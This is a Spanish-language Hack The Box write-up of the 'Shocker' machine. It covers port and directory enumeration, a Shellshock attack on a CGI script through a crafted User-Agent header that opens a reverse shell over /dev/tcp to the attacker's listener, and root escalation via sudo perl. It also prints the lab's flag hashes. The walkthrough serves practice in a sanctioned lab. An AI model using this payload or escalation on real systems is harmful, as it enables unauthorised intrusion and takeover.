[HTB] Shocker

Hoy vamos a hackear la maquina de HTB llamada Shocker.

Video


Enumeration


Para empezar hacemos un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 23:41 CEST
Nmap scan report for 10.10.10.56
Host is up (0.037s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
Buscamos si hay algo interesante en Apache...

sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/ -w 
/usr/share/wordlists/dirb/common.txt -x sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh
[+] Timeout:        10s
===============================================================
2020/05/09 23:42:24 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
===============================================================
2020/05/09 23:43:11 Finished
==============================================================
Miramos dentro del directorio cgi-bin.

sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/cgi-bin -w 
/usr/share/wordlists/dirb/common.txt -x sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh
[+] Timeout:        10s
===============================================================
2020/05/09 23:44:24 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.sh (Status: 403)
/.htaccess (Status: 403)
/.htaccess.sh (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/05/09 23:45:01 Finished
==============================================================
Vemos el fichero user.sh, y todo tiene pinta a que vamos a poder "abusar" de shellshock...

Exploitation


Ponemos a nc a la escucha:

sml@Cassandra:~$ nc -nlvp 5555
En otro terminal, usamos "shellshock" contra el fichero user.sh

sml@Cassandra:~$ curl -H 'User-Agent: () { :; }; /bin/sh -i >& 
/dev/tcp/10.10.14.10/5555 0>&1' http://10.10.10.56/cgi-bin/user.sh
Estamos dentro :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 36732
/bin/sh: 0: can't access tty; job control turned off
$ 

user.txt


Exploramos el sistema...

$ id
uid=1000(shelly) gid=1000(shelly) 
groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),1
16(sambashare)
$ cd /home
$ ls
shelly
$ cd shelly
$ ls
user.txt
$ cat user.txt
2ec24e11320026d1e70ff3e16695b233

Privilege Escalation


Echamos un vistazo a sudo...

$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
Vemos que podemos ejecutar perl como "root", asi que ejecutamos una shell :)

$ sudo perl -e 'exec "/bin/sh";'
/bin/bash -i
bash: no job control in this shell
root@Shocker:/home/shelly# 

root.txt



root@Shocker:/home/shelly# cd /root
root@Shocker:~# ls
root.txt
root@Shocker:~# cat root.txt
cat root.txt
52c2715605d70c7619030560dc1ca467

End


Y con esto ya tendriamos el flag del "user" y el flag de "root".